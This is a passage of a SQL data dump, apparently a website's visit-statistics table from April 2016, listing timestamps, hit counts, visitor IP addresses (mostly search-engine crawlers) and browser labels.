,1461344271,1,0,1,0,'66.249.66.76',''),(37094,1461344445,2,2,0,0,'130.193.50.34','other'),(37095,1461344619,1,1,0,0,'91.196.178.33','chrome'),(37096,1461344878,1,1,0,0,'178.154.189.202','other'),(37097,1461345455,1,1,0,0,'91.124.181.69','firefox'),(37098,1461346836,1,1,0,0,'91.196.178.65','firefox'),(37099,1461347038,1,1,0,0,'91.196.178.166','chrome'),(37100,1461347429,1,1,0,0,'178.154.189.202','other'),(37101,1461348742,4,4,0,0,'130.193.50.34','other'),(37102,1461350741,1,1,0,0,'91.124.181.69','other'),(37103,1461353389,1,1,0,0,'141.8.132.105','other'),(37104,1461354984,2,2,0,0,'141.8.142.62','other'),(37105,1461354985,1,1,0,0,'130.193.50.32','other'),(37106,1461354987,1,1,0,0,'141.8.142.61','other'),(37107,1461355113,1,1,0,0,'141.8.184.11','other'),(37108,1461355144,1,1,0,0,'93.158.152.46','other'),(37109,1461355166,1,1,0,0,'37.73.221.84','chrome'),(37110,1461355240,1,1,0,0,'5.255.253.53','other'),(37111,1461355369,1,0,1,0,'66.249.66.76',''),(37112,1461355388,1,1,0,0,'5.255.253.36','other'),(37113,1461359975,1,1,0,0,'37.9.122.202','other'),(37114,1461360378,1,0,1,0,'66.249.66.57',''),(37115,1461361606,2,2,0,0,'178.154.189.202','other'),(37116,1461362176,1,1,0,0,'5.255.253.10','other'),(37117,1461362302,1,1,0,0,'141.8.132.99','other'),(37118,1461362476,1,1,0,0,'130.193.51.19','other'),(37119,1461362612,1,1,0,0,'5.255.253.100','other'),(37120,1461362615,1,1,0,0,'141.8.132.101','other'),(37121,1461362760,1,1,0,0,'93.158.152.46','other'),(37122,1461362888,1,1,0,0,'5.9.151.22','other'),(37123,1461362938,1,1,0,0,'141.8.142.78','other'),(37124,1461363087,1,1,0,0,'130.193.51.81','other'),(37125,1461363684,1,1,0,0,'93.158.152.9','other'),(37126,1461364907,3,3,0,0,'178.154.189.202','other'),(37127,1461365952,2,2,0,0,'178.154.189.202','other'),(37128,1461366940,1,1,0,0,'178.154.189.202','other'),(37129,1461368230,1,1,0,0,'37.9.122.202','other'),(37130,1461368319,1,0,1,0,'66.249.66.76',''),(37131,1461369600,1,1,0,0,'141.8.142.10','other'),(37132,1461369700,1,1,0,0,'141.8.132.52','other'),(37133,1461369806,1,1,0,0,'5.255.253.36','other'),(37134,1461369935,1,1,0,0,'178.154.149.11','other'),(37135,1461370081,1,1,0,0,'5.255.253.10','other'),(37136,1461371392,1,1,0,0,'66.249.66.54','chrome'),(37137,1461371699,1,1,0,0,'66.249.66.82','chrome'),(37138,1461373641,2,2,0,0,'178.154.189.202','other'),(37139,1461374912,1,1,0,0,'66.249.66.79','chrome'),(37140,1461375010,1,1,0,0,'178.154.189.202','other'),(37141,1461375022,1,1,0,0,'178.154.189.203','other'),(37142,1461375645,1,1,0,0,'62.212.73.211','other'),(37143,1461376016,1,1,0,0,'5.255.253.9','other'),(37144,1461376018,1,1,0,0,'5.255.253.113','other'),(37145,1461376626,2,2,0,0,'178.154.189.202','other'),(37146,1461377846,1,1,0,0,'178.154.189.202','other'),(37147,1461378036,1,1,0,0,'141.8.132.30','other'),(37148,1461378302,1,1,0,0,'130.193.50.4','other'),(37149,1461378440,1,1,0,0,'130.193.51.43','other'),(37150,1461378576,1,1,0,0,'141.8.142.10','other'),(37151,1461379474,2,0,2,0,'66.249.66.82',''),(37152,1461379684,1,1,0,0,'178.154.189.202','other'),(37153,1461382302,1,1,0,0,'178.154.189.202','other'),(37154,1461383644,1,1,0,0,'130.193.50.34','other'),(37155,1461383986,1,1,0,0,'66.249.66.79','chrome'),(37156,1461384155,1,1,0,0,'178.154.189.202','other'),(37157,1461384494,1,1,0,0,'66.249.66.82','chrome'),(37158,1461388366,2,2,0,0,'130.193.50.34','other'),(37159,1461390348,1,1,0,0,'66.249.93.150','chrome'),(37160,1461390660,2,2,0,0,'193.194.127.217','firefox'),(37161,1461390828,1,1,0,0,'66.249.66.54','chrome'),(37162,1461391382,1,1,0,0,'5.255.253.113','other'),(37163,1461391447,1,1,0,0,'91.124.181.69','firefox'),(37164,1461394336,1,0,1,0,'66.249.66.76',''),(37165,1461394970,1,0,1,0,'68.180.229.90',''),(37166,1461395252,1,1,0,0,'91.124.181.69','firefox'),(37167,1461398099,1,1,0,0,'89.19.7.58','firefox'),(37168,1461399619,1,1,0,0,'180.76.15.146','other'),(37169,1461400724,1,1,0,0,'130.193.50.34','other'),(37170,1461403075,1,0,1,0,'66.249.66.82',''),(37171,1461404108,1,1,0,0,'91.124.181.69','firefox'),(37172,1461404865,1,1,0,0,'180.76.15.11','other'),(37173,1461407757,1,0,1,0,'66.249.66.57',''),(37174,1461410702,1,0,1,0,'66.249.66.76',''),(37175,1461412358,1,1,0,0,'5.255.253.100','other'),(37176,1461412499,1,1,0,0,'5.255.253.36','other'),(37177,1461413080,1,1,0,0,'141.8.183.25','other'),(37178,1461414998,1,1,0,0,'91.196.178.33','firefox'),(37179,1461416525,1,1,0,0,'141.8.183.25','other'),(37180,1461416560,1,1,0,0,'5.9.87.111','other'),(37181,1461417388,1,1,0,0,'37.54.17.8','chrome'),(37182,1461419690,1,1,0,0,'130.193.50.34','other'),(37183,1461420074,1,1,0,0,'91.196.178.132','chrome'),(37184,1461420769,1,1,0,0,'130.185.155.10','msie'),(37185,1461423125,1,1,0,0,'91.124.181.69','firefox'),(37186,1461425465,1,1,0,0,'141.8.132.41','other'),(37187,1461425467,1,1,0,0,'141.8.142.62','other'),(37188,1461425502,1,0,1,0,'66.249.64.108',''),(37189,1461425838,1,1,0,0,'66.249.64.249','chrome'),(37190,1461425839,2,0,2,0,'66.249.64.118',''),(37191,1461425905,1,1,0,0,'130.193.50.34','other'),(37192,1461426097,1,1,0,0,'66.249.64.108','chrome'),(37193,1461426777,1,1,0,0,'141.8.183.25','other'),(37194,1461426939,1,1,0,0,'188.166.44.88','other'),(37195,1461428375,2,0,2,0,'66.249.64.108',''),(37196,1461428713,1,0,1,0,'66.249.64.113',''),(37197,1461429714,1,0,1,0,'66.249.64.118',''),(37198,1461430269,2,0,2,0,'66.249.64.113',''),(37199,1461433750,1,1,0,0,'5.255.253.113','other'),(37200,1461434595,1,1,0,0,'130.193.50.34','other'),(37201,1461437513,1,1,0,0,'180.76.15.27','other'),(37202,1461437633,1,1,0,0,'91.196.178.134','chrome'),(37203,1461437816,1,1,0,0,'141.8.183.25','other'),(37204,1461440488,1,1,0,0,'130.193.50.34','other'),(37205,1461440613,1,1,0,0,'130.193.51.74','other'),(37206,1461447476,1,1,0,0,'5.255.253.113','other'),(37207,1461448406,1,1,0,0,'5.255.253.10','other'),(37208,1461448533,1,1,0,0,'141.8.142.58','other'),(37209,1461450175,1,1,0,0,'130.193.50.34','other'),(37210,1461455391,1,1,0,0,'66.249.64.239','chrome'),(37211,1461456002,1,1,0,0,'66.249.64.108','chrome'),(37212,1461456529,2,0,2,0,'66.249.64.118',''),(37213,1461457702,1,0,1,0,'66.249.64.108',''),(37214,1461458137,1,1,0,0,'141.8.142.58','other'),(37215,1461458567,2,0,2,0,'66.249.64.118',''),(37216,1461459243,1,0,1,0,'66.249.64.113',''),(37217,1461461321,1,0,1,0,'66.249.64.113',''),(37218,1461461607,1,0,1,0,'66.249.64.118',''),(37219,1461463373,1,1,0,0,'141.8.132.105','other'),(37220,1461463496,3,3,0,0,'130.193.50.34','other'),(37221,1461464565,1,1,0,0,'130.193.50.34','other'),(37222,1461469681,1,1,0,0,'130.193.50.34','other'),(37223,1461471463,1,0,1,0,'66.249.64.113',''),(37224,1461471979,1,1,0,0,'207.46.13.63','other'),(37225,1461479027,5,5,0,0,'91.124.181.69','firefox'),(37226,1461479174,1,1,0,0,'141.8.183.25','other'),(37227,1461479550,2,2,0,0,'82.145.219.189','opera'),(37228,1461481061,1,1,0,0,'141.8.132.105','other'),(37229,1461481213,2,2,0,0,'91.124.181.69','firefox'),(37230,1461482152,1,1,0,0,'157.55.39.249','other'),(37231,1461482388,1,1,0,0,'207.46.13.171','other'),(37232,1461482788,1,1,0,0,'66.249.93.147','chrome'),(37233,1461485385,2,2,0,0,'141.8.132.105','other'),(37234,1461485428,1,1,0,0,'91.124.181.69','firefox'),(37235,1461485530,3,3,0,0,'130.193.50.34','other'),(37236,1461489831,1,0,1,0,'66.249.64.108',''),(37237,1461491922,1,1,0,0,'130.193.50.34','other'),(37238,1461492068,1,1,0,0,'93.158.152.51','other'),(37239,1461492993,1,1,0,0,'204.79.180.17','msie'),(37240,1461493394,1,1,0,0,'204.79.180.250','msie'),(37241,1461495135,1,1,0,0,'78.111.190.23','chrome'),(37242,1461495205,1,1,0,0,'130.193.50.34','other'),(37243,1461495469,1,1,0,0,'141.8.132.105','other'),(37244,1461496172,1,1,0,0,'46.211.112.163','other'),(37245,1461496220,1,1,0,0,'130.193.50.34','other'),(37246,1461497315,1,1,0,0,'91.196.178.103','chrome'),(37247,1461498383,3,0,3,0,'66.249.64.239',''),(37248,1461499034,1,1,0,0,'91.124.181.69','firefox'),(37249,1461499278,1,1,0,0,'5.255.253.113','other'),(37250,1461499826,1,1,0,0,'46.174.126.183','chrome'),(37251,1461502358,1,1,0,0,'207.46.13.63','other'),(37252,1461502376,1,1,0,0,'207.46.13.181','other'),(37253,1461502779,1,0,1,0,'66.249.78.143',''),(37254,1461503114,1,0,1,0,'66.249.78.178',''),(37255,1461503408,1,1,0,0,'46.4.120.3','other'),(37256,1461504661,1,1,0,0,'66.249.78.150','chrome'),(37257,1461505744,1,1,0,0,'37.73.195.129','other'),(37258,1461506279,1,0,1,0,'66.249.78.150',''),(37259,1461507157,1,1,0,0,'180.76.15.156','other'),(37260,1461507773,1,1,0,0,'91.196.178.33','firefox'),(37261,1461509166,1,1,0,0,'91.196.178.33','firefox'),(37262,1461509882,1,1,0,0,'130.193.50.34','other'),(37263,1461510094,1,0,1,0,'66.249.78.150',''),(37264,1461510277,2,2,0,0,'91.124.181.69','firefox'),(37265,1461510348,1,1,0,0,'91.196.178.33','firefox'),(37266,1461510970,2,0,2,0,'66.249.78.171',''),(37267,1461511111,5,0,5,0,'66.249.78.164',''),(37268,1461511290,1,0,1,0,'66.249.66.79',''),(37269,1461511313,2,1,1,0,'66.249.78.164',''),(37270,1461511545,2,1,1,0,'66.249.78.178',''),(37271,1461511613,1,1,0,0,'91.124.181.69','firefox'),(37272,1461511710,1,1,0,0,'178.93.148.234','chrome'),(37273,1461512203,1,1,0,0,'66.249.78.178','other'),(37274,1461512483,1,1,0,0,'66.249.93.150','chrome'),(37275,1461512562,1,1,0,0,'91.196.178.33','firefox'),(37276,1461512761,2,0,2,0,'66.249.78.171',''),(37277,1461513120,1,1,0,0,'66.249.78.164','other'),(37278,1461513763,1,1,0,0,'66.249.78.178','other'),(37279,1461513837,1,1,0,0,'141.8.132.105','other'),(37280,1461513839,1,1,0,0,'130.193.50.34','other'),(37281,1461515771,1,1,0,0,'91.124.181.69','firefox'),(37282,1461516375,1,0,1,0,'66.249.78.150',''),(37283,1461521186,1,1,0,0,'91.124.181.69','firefox'),(37284,1461521883,1,1,0,0,'91.196.178.99','chrome'),(37285,1461522594,1,1,0,0,'130.193.50.34','other'),(37286,1461522632,1,1,0,0,'5.255.253.113','other'),(37287,1461523263,1,1,0,0,'204.79.180.151','msie'),(37288,1461523982,2,0,2,0,'66.249.78.136',''),(37289,1461524287,1,1,0,0,'5.255.253.113','other'),(37290,1461525144,1,1,0,0,'66.249.78.164','chrome'),(37291,1461528185,1,1,0,0,'5.255.253.113','other'),(37292,1461529051,1,1,0,0,'180.76.15.149','other'),(37293,1461529729,2,2,0,0,'141.8.132.105','other'),(37294,1461529733,5,5,0,0,'130.193.50.34','other'),(37295,1461530233,1,1,0,0,'130.193.51.83','other'),(37296,1461531212,1,1,0,0,'64.246.178.34','firefox'),(37297,1461535916,2,2,0,0,'130.193.50.34','other'),(37298,1461536306,1,1,0,0,'141.8.183.25','other'),(37299,1461536795,1,0,1,0,'66.249.78.178',''),(37300,1461537135,1,1,0,0,'66.249.78.136','chrome'),(37301,1461537525,1,1,0,0,'66.249.78.164','chrome'),(37302,1461538709,1,1,0,0,'130.193.50.34','other'),(37303,1461544197,1,1,0,0,'130.193.50.34','other'),(37304,1461546090,1,1,0,0,'157.55.39.73','other'),(37305,1461546209,1,1,0,0,'5.255.253.113','other'),(37306,1461548858,1,0,1,0,'66.249.78.164',''),(37307,1461549663,1,1,0,0,'157.55.39.199','other'),(37308,1461550629,1,1,0,0,'66.249.78.143','chrome'),(37309,1461550997,1,0,1,0,'66.249.78.150',''),(37310,1461554031,1,1,0,0,'141.8.132.105','other'),(37311,1461555196,1,1,0,0,'141.8.132.105','other'),(37312,1461558861,62,62,0,0,'5.9.111.70','other'),(37313,1461559102,1,1,0,0,'130.193.50.34','other'),(37314,1461561696,1,1,0,0,'91.196.178.68','firefox'),(37315,1461562610,1,1,0,0,'176.241.109.84','firefox'),(37316,1461563242,1,1,0,0,'91.196.178.70','chrome'),(37317,1461563310,1,1,0,0,'91.196.178.70','firefox'),(37318,1461563506,1,0,1,0,'66.249.78.164',''),(37319,1461564576,1,0,1,0,'66.249.78.164',''),(37320,1461564749,1,1,0,0,'130.193.50.34','other'),(37321,1461566813,2,2,0,0,'91.196.178.68','firefox'),(37322,1461566912,1,1,0,0,'130.193.50.34','other'),(37323,1461566977,1,1,0,0,'91.196.178.68','chrome'),(37324,1461567148,1,1,0,0,'209.126.127.49','other'),(37325,1461567447,1,1,0,0,'91.196.178.130','chrome'),(37326,1461567649,1,1,0,0,'91.196.178.70','chrome'),(37327,1461568112,2,2,0,0,'91.196.178.70','firefox'),(37328,1461568172,1,1,0,0,'95.132.95.80','chrome'),(37329,1461568617,1,1,0,0,'91.196.178.169','chrome'),(37330,1461568621,2,2,0,0,'91.196.178.68','firefox'),(37331,1461568965,1,1,0,0,'157.55.39.69','other'),(37332,1461569025,1,1,0,0,'178.94.220.214','opera'),(37333,1461569938,1,1,0,0,'178.94.220.214','opera'),(37334,1461570255,1,1,0,0,'91.196.178.72','chrome'),(37335,1461570581,1,1,0,0,'91.196.178.105','chrome'),(37336,1461571120,1,1,0,0,'204.79.180.36','msie'),(37337,1461571193,1,1,0,0,'91.196.178.68','firefox'),(37338,1461571224,1,1,0,0,'212.1.98.242','chrome'),(37339,1461571368,1,1,0,0,'66.249.78.178','chrome'),(37340,1461571776,4,4,0,0,'91.196.178.68','chrome'),(37341,1461571843,1,1,0,0,'141.8.132.105','other'),(37342,1461571965,1,1,0,0,'37.52.23.53','chrome'),(37343,1461572164,1,1,0,0,'212.1.98.242','chrome'),(37344,1461572514,1,1,0,0,'66.249.78.164','chrome'),(37345,1461572618,1,1,0,0,'91.196.178.68','firefox'),(37346,1461573080,1,1,0,0,'91.196.178.70','chrome'),(37347,1461573147,1,1,0,0,'91.196.178.70','firefox'),(37348,1461573729,1,1,0,0,'141.8.132.105','other'),(37349,1461574859,1,1,0,0,'91.196.178.68','firefox'),(37350,1461575286,1,1,0,0,'66.249.78.164','chrome'),(37351,1461575631,1,1,0,0,'91.196.178.66','chrome'),(37352,1461576330,2,2,0,0,'91.196.178.70','firefox'),(37353,1461577028,1,1,0,0,'91.196.178.130','chrome'),(37354,1461577422,1,1,0,0,'178.95.244.60','firefox'),(37355,1461578148,1,1,0,0,'78.111.190.50','chrome'),(37356,1461578238,1,1,0,0,'91.196.178.68','firefox'),(37357,1461578335,1,0,1,0,'66.249.78.171',''),(37358,1461578956,1,1,0,0,'91.196.178.72','firefox'),(37359,1461579482,1,1,0,0,'5.255.253.113','other'),(37360,1461581207,1,1,0,0,'130.193.50.34','other'),(37361,1461583581,1,1,0,0,'149.56.110.178','other'),(37362,1461583608,1,1,0,0,'91.196.178.68','firefox'),(37363,1461586048,1,1,0,0,'82.207.49.94','chrome'),(37364,1461587554,2,2,0,0,'141.8.132.105','other'),(37365,1461587867,4,4,0,0,'130.193.50.34','other'),(37366,1461588727,1,1,0,0,'141.8.183.25','other'),(37367,1461588949,1,0,1,0,'66.249.78.143',''),(37368,1461590064,1,1,0,0,'94.178.233.214','firefox'),(37369,1461590197,1,1,0,0,'130.193.50.34','other'),(37370,1461590923,1,1,0,0,'91.196.178.72','firefox'),(37371,1461591985,1,1,0,0,'91.196.178.130','chrome'),(37372,1461593094,1,1,0,0,'91.196.178.68','firefox'),(37373,1461594319,1,1,0,0,'91.196.178.130','chrome'),(37374,1461595189,1,1,0,0,'92.113.12.4','chrome'),(37375,1461595630,7,7,0,0,'130.193.50.34','other'),(37376,1461596101,1,1,0,0,'46.133.238.21','other'),(37377,1461596616,2,2,0,0,'130.193.50.34','other'),(37378,1461597209,1,0,1,0,'66.249.66.79',''),(37379,1461597728,1,1,0,0,'141.8.132.105','other'),(37380,1461599154,1,1,0,0,'91.196.178.33','firefox'),(37381,1461601205,1,0,1,0,'66.249.66.82',''),(37382,1461602777,1,1,0,0,'141.8.184.11','other'),(37383,1461602780,1,1,0,0,'130.193.51.19','other'),(37384,1461602913,1,1,0,0,'141.8.132.105','other'),(37385,1461603084,1,1,0,0,'130.193.50.34','other'),(37386,1461604151,1,1,0,0,'91.124.239.85','firefox'),(37387,1461608438,3,3,0,0,'130.193.50.34','other'),(37388,1461608713,1,1,0,0,'141.8.132.105','other'),(37389,1461609939,2,2,0,0,'157.55.39.91','other'),(37390,1461609944,1,1,0,0,'207.46.13.78','other'),(37391,1461610384,63,63,0,0,'69.30.198.242','other'),(37392,1461611159,1,1,0,0,'207.46.13.80','other'),(37393,1461612095,1,1,0,0,'130.193.50.32','other'),(37394,1461612109,1,1,0,0,'178.154.149.11','other'),(37395,1461618772,1,1,0,0,'188.166.48.88','other'),(37396,1461620282,1,1,0,0,'66.249.66.60','chrome'),(37397,1461620778,1,1,0,0,'141.8.132.105','other'),(37398,1461620913,1,1,0,0,'130.193.50.34','other'),(37399,1461621011,1,1,0,0,'207.46.13.113','other'),(37400,1461621030,1,1,0,0,'157.55.39.91','other'),(37401,1461621202,1,0,1,0,'66.249.66.82',''),(37402,1461622448,1,1,0,0,'66.249.66.54','chrome'),(37403,1461622700,1,1,0,0,'66.249.66.82','chrome'),(37404,1461624398,2,2,0,0,'130.193.50.34','other'),(37405,1461624677,1,1,0,0,'141.8.132.105','other'),(37406,1461629159,1,1,0,0,'141.8.183.25','other'),(37407,1461629777,3,3,0,0,'141.8.132.105','other'),(37408,1461630032,1,1,0,0,'130.193.50.34','other'),(37409,1461630195,1,1,0,0,'141.8.183.25','other'),(37410,1461630712,1,1,0,0,'66.249.66.57','chrome'),(37411,1461631391,1,1,0,0,'130.193.50.34','other'),(37412,1461632695,1,1,0,0,'130.193.50.34','other'),(37413,1461632923,1,1,0,0,'37.9.122.201','other'),(37414,1461636037,1,1,0,0,'141.8.183.25','other'),(37415,1461636041,1,1,0,0,'141.8.132.105','other'),(37416,1461636203,1,1,0,0,'66.249.66.57','chrome'),(37417,1461638194,1,0,1,0,'66.249.66.79',''),(37418,1461638947,1,1,0,0,'66.249.66.76','chrome'),(37419,1461640730,1,1,0,0,'178.154.189.202','other'),(37420,1461643179,1,1,0,0,'130.193.50.34','other'),(37421,1461646052,1,0,1,0,'66.249.66.79',''),(37422,1461647635,1,1,0,0,'91.196.178.68','firefox'),(37423,1461648782,1,1,0,0,'91.196.178.102','chrome'),(37424,1461648834,1,1,0,0,'91.196.178.68','firefox'),(37425,1461649134,1,1,0,0,'91.196.178.36','chrome'),(37426,1461649199,1,1,0,0,'89.145.95.41','other'),(37427,1461649341,1,1,0,0,'66.249.93.150','chrome'),(37428,1461650262,1,1,0,0,'130.193.51.79','other'),(37429,1461651039,1,1,0,0,'141.8.132.105','other'),(37430,1461651298,1,1,0,0,'130.193.50.34','other'),(37431,1461651531,1,1,0,0,'91.196.178.68','firefox'),(37432,1461651664,1,1,0,0,'91.196.178.68','chrome'),(37433,1461651863,63,63,0,0,'188.40.95.70','other'),(37434,1461652003,1,1,0,0,'5.255.253.113','other'),(37435,1461652345,1,1,0,0,'37.53.90.175','chrome'),(37436,1461652373,1,1,0,0,'141.8.132.105','other'),(37437,1461652815,1,1,0,0,'91.196.178.70','chrome'),(37438,1461653315,1,1,0,0,'130.193.50.38','other'),(37439,1461655409,1,0,1,0,'66.249.66.60',''),(37440,1461656243,1,1,0,0,'178.154.189.202','other'),(37441,1461657525,1,1,0,0,'91.196.178.68','firefox'),(37442,1461657914,1,1,0,0,'66.249.66.79','chrome'),(37443,1461658715,1,0,1,0,'66.249.66.54',''),(37444,1461659929,1,1,0,0,'91.196.178.97','chrome'),(37445,1461660065,1,0,1,0,'66.249.66.82',''),(37446,1461662154,1,1,0,0,'91.196.178.70','chrome'),(37447,1461662642,1,1,0,0,'93.73.234.193','firefox'),(37448,1461662680,1,1,0,0,'91.196.178.68','firefox'),(37449,1461664314,1,1,0,0,'130.180.216.57','chrome'),(37450,1461665090,1,1,0,0,'37.53.224.137','chrome'),(37451,1461665671,2,2,0,0,'141.8.132.105','other'),(37452,1461668342,1,1,0,0,'66.249.66.79','chrome'),(37453,1461668628,1,1,0,0,'94.179.22.227','firefox'),(37454,1461670153,1,1,0,0,'91.196.178.68','firefox'),(37455,1461670195,1,1,0,0,'91.196.178.71','firefox'),(37456,1461670679,1,1,0,0,'66.249.66.57','chrome'),(37457,1461671719,1,1,0,0,'94.179.3.81','firefox'),(37458,1461672186,2,2,0,0,'130.193.50.34','other'),(37459,1461673756,1,1,0,0,'91.196.178.164','chrome'),(37460,1461673916,1,1,0,0,'5.255.253.113','other'),(37461,1461674304,1,1,0,0,'91.196.178.70','firefox'),(37462,1461675369,1,1,0,0,'130.180.216.57','chrome'),(37463,1461676016,1,1,0,0,'91.196.178.70','firefox'),(37464,1461676289,1,1,0,0,'180.76.15.20','other'),(37465,1461676919,1,1,0,0,'91.196.178.68','firefox'),(37466,1461677912,2,2,0,0,'91.196.178.70','firefox'),(37467,1461678096,1,1,0,0,'141.8.183.25','other'),(37468,1461678217,1,1,0,0,'141.8.132.105','other'),(37469,1461678981,1,1,0,0,'91.196.178.70','firefox'),(37470,1461679043,1,0,1,0,'66.249.66.79',''),(37471,1461680056,1,1,0,0,'66.249.66.60','chrome'),(37472,1461680063,1,0,1,0,'66.249.66.82',''),(37473,1461680366,1,1,0,0,'66.249.66.57','chrome'),(37474,1461681887,1,1,0,0,'66.249.66.76','chrome'),(37475,1461682150,1,1,0,0,'66.249.66.60','chrome'),(37476,1461682248,1,1,0,0,'91.196.178.71','firefox'),(37477,1461685237,1,1,0,0,'46.211.138.29','chrome'),(37478,1461686139,1,1,0,0,'37.55.225.85','firefox'),(37479,1461686736,1,1,0,0,'141.8.132.105','other'),(37480,1461687083,1,0,1,0,'66.249.66.82',''),(37481,1461687118,3,0,3,0,'66.249.66.76',''),(37482,1461689280,1,1,0,0,'66.249.66.79','other'),(37483,1461690504,1,1,0,0,'91.196.178.37','chrome'),(37484,1461692701,1,1,0,0,'178.154.189.202','other'),(37485,1461693139,1,1,0,0,'141.8.184.22','other'),(37486,1461693266,1,1,0,0,'130.193.51.45','other'),(37487,1461693393,1,1,0,0,'141.8.142.58','other'),(37488,1461693525,1,1,0,0,'130.193.50.34','other'),(37489,1461694325,1,1,0,0,'157.55.39.82','other'),(37490,1461694330,2,2,0,0,'157.55.39.158','other'),(37491,1461694336,1,1,0,0,'157.55.39.165','other'),(37492,1461697717,1,1,0,0,'5.153.233.130','msie'),(37493,1461697985,1,1,0,0,'37.52.18.207','chrome'),(37494,1461698358,1,1,0,0,'130.193.50.34','other'),(37495,1461699844,1,1,0,0,'91.196.121.187','firefox'),(37496,1461700603,1,0,1,0,'66.249.66.82',''),(37497,1461702427,1,1,0,0,'66.249.66.76','chrome'),(37498,1461703532,1,1,0,0,'130.193.50.34','other'),(37499,1461704404,1,1,0,0,'66.249.66.76','chrome'),(37500,1461705163,1,1,0,0,'66.249.66.82','chrome'),(37501,1461707796,1,1,0,0,'5.255.253.113','other'),(37502,1461709378,1,0,1,0,'66.249.66.79',''),(37503,1461709684,1,1,0,0,'178.154.189.202','other'),(37504,1461712141,1,1,0,0,'180.76.15.137','other'),(37505,1461714548,1,1,0,0,'66.249.66.60','chrome'),(37506,1461714839,1,1,0,0,'130.193.50.34','other'),(37507,1461719249,1,1,0,0,'130.193.51.83','other'),(37508,1461720562,4,1,3,0,'66.249.66.57',''),(37509,1461720679,2,0,2,0,'66.249.66.60',''),(37510,1461721516,1,0,1,0,'66.249.66.57',''),(37511,1461723379,2,2,0,0,'66.249.66.57','chrome'),(37512,1461724686,1,0,1,0,'66.249.66.82',''),(37513,1461725155,1,0,1,0,'66.249.66.57',''),(37514,1461726038,1,1,0,0,'66.249.66.82','chrome'),(37515,1461726176,1,1,0,0,'5.255.253.113','other'),(37516,1461732529,1,1,0,0,'178.154.189.202','other'),(37517,1461734362,1,1,0,0,'37.55.225.85','firefox'),(37518,1461734426,1,1,0,0,'91.196.178.71','chrome'),(37519,1461734944,1,1,0,0,'66.249.93.153','chrome'),(37520,1461735870,1,0,1,0,'66.249.66.60',''),(37521,1461736058,1,1,0,0,'94.179.26.101','chrome'),(37522,1461736339,1,1,0,0,'141.8.183.19','other'),(37523,1461736583,1,1,0,0,'91.196.178.71','chrome'),(37524,1461737766,2,0,2,0,'66.249.66.57',''),(37525,1461737787,1,0,1,0,'66.249.66.76',''),(37526,1461737817,3,0,3,0,'66.249.66.54',''),(37527,1461738702,1,0,1,0,'66.249.66.57',''),(37528,1461740332,1,1,0,0,'37.55.225.85','firefox'),(37529,1461740698,1,1,0,0,'180.76.15.159','other'),(37530,1461741335,1,1,0,0,'37.55.225.85','firefox'),(37531,1461741360,1,0,1,0,'66.249.66.79',''),(37532,1461743335,1,1,0,0,'91.196.178.67','chrome'),(37533,1461744785,2,2,0,0,'91.196.178.70','chrome'),(37534,1461744838,1,0,1,0,'66.249.66.60',''),(37535,1461745057,2,0,2,0,'66.249.66.57',''),(37536,1461746832,1,0,1,0,'66.249.66.57',''),(37537,1461749683,1,1,0,0,'130.193.50.34','other'),(37538,1461749794,1,0,1,0,'66.249.66.57',''),(37539,1461750492,1,0,1,0,'66.249.66.54',''),(37540,1461750729,2,2,0,0,'130.193.50.34','other'),(37541,1461751015,1,1,0,0,'141.8.132.105','other'),(37542,1461753009,1,1,0,0,'37.55.225.85','firefox'),(37543,1461753726,1,1,0,0,'91.124.134.91','chrome'),(37544,1461754239,1,1,0,0,'130.193.50.34','other'),(37545,1461754940,1,1,0,0,'37.55.225.85','firefox'),(37546,1461755389,1,0,1,0,'66.249.66.76',''),(37547,1461758662,1,1,0,0,'91.196.178.70','firefox'),(37548,1461759408,1,0,1,0,'66.249.66.4',''),(37549,1461759772,1,1,0,0,'91.196.178.70','firefox'),(37550,1461761170,1,1,0,0,'141.8.132.105','other'),(37551,1461761835,1,0,1,0,'66.249.66.82',''),(37552,1461762536,1,1,0,0,'207.46.13.192','other'),(37553,1461763000,1,1,0,0,'157.55.39.73','other'),(37554,1461763252,1,1,0,0,'141.8.132.105','other'),(37555,1461763338,1,0,1,0,'66.249.66.54',''),(37556,1461763693,1,1,0,0,'91.196.178.65','firefox'),(37557,1461763854,1,1,0,0,'157.55.39.192','other'),(37558,1461763976,1,0,1,0,'66.249.66.82',''),(37559,1461764003,1,1,0,0,'37.53.90.175','firefox'),(37560,1461764018,1,1,0,0,'37.52.80.35','chrome'),(37561,1461764370,1,1,0,0,'157.55.39.88','other'),(37562,1461765091,2,2,0,0,'141.8.132.105','other'),(37563,1461765423,1,1,0,0,'91.196.178.67','firefox'),(37564,1461765481,1,1,0,0,'130.193.50.34','other'),(37565,1461766308,1,1,0,0,'141.8.183.25','other'),(37566,1461766441,1,1,0,0,'130.193.50.34','other'),(37567,1461768276,1,1,0,0,'66.249.65.124','chrome'),(37568,1461769330,1,1,0,0,'66.249.65.118','chrome'),(37569,1461769658,1,1,0,0,'66.249.65.101','chrome'),(37570,1461771860,1,1,0,0,'91.196.178.70','firefox'),(37571,1461772176,1,0,1,0,'66.249.65.107',''),(37572,1461773504,1,1,0,0,'91.196.178.70','firefox'),(37573,1461773512,1,1,0,0,'66.249.65.118','chrome'),(37574,1461774355,2,2,0,0,'66.249.65.101','chrome'),(37575,1461774600,2,2,0,0,'66.249.65.104','chrome'),(37576,1461775834,1,1,0,0,'37.55.225.85','firefox'),(37577,1461776829,1,0,1,0,'66.249.65.101',''),(37578,1461776968,1,1,0,0,'5.255.253.113','other'),(37579,1461777111,1,0,1,0,'66.249.65.124',''),(37580,1461778089,1,0,1,0,'66.249.65.124',''),(37581,1461778547,1,1,0,0,'37.55.225.85','firefox'),(37582,1461780309,1,1,0,0,'66.249.65.104','chrome'),(37583,1461781262,1,1,0,0,'66.249.65.124','chrome'),(37584,1461784168,2,2,0,0,'141.8.183.25','other'),(37585,1461786013,1,1,0,0,'141.8.132.105','other'),(37586,1461787078,1,1,0,0,'130.193.50.34','other'),(37587,1461788209,1,0,1,0,'66.249.65.101',''),(37588,1461789118,1,1,0,0,'130.193.50.34','other'),(37589,1461789396,1,1,0,0,'141.8.132.105','other'),(37590,1461792563,1,0,1,0,'66.249.65.121',''),(37591,1461793621,1,1,0,0,'157.55.39.234','other'),(37592,1461794049,1,0,1,0,'66.249.65.104',''),(37593,1461798077,1,1,0,0,'141.8.132.105','other'),(37594,1461798947,1,1,0,0,'40.77.167.67','other'),(37595,1461800842,1,1,0,0,'130.193.50.34','other'),(37596,1461801203,1,0,1,0,'66.249.65.101',''),(37597,1461803669,1,1,0,0,'130.193.50.34','other'),(37598,1461804413,1,0,1,0,'66.249.65.121',''),(37599,1461805302,1,1,0,0,'144.76.12.78','other'),(37600,1461810394,1,0,1,0,'66.249.65.107',''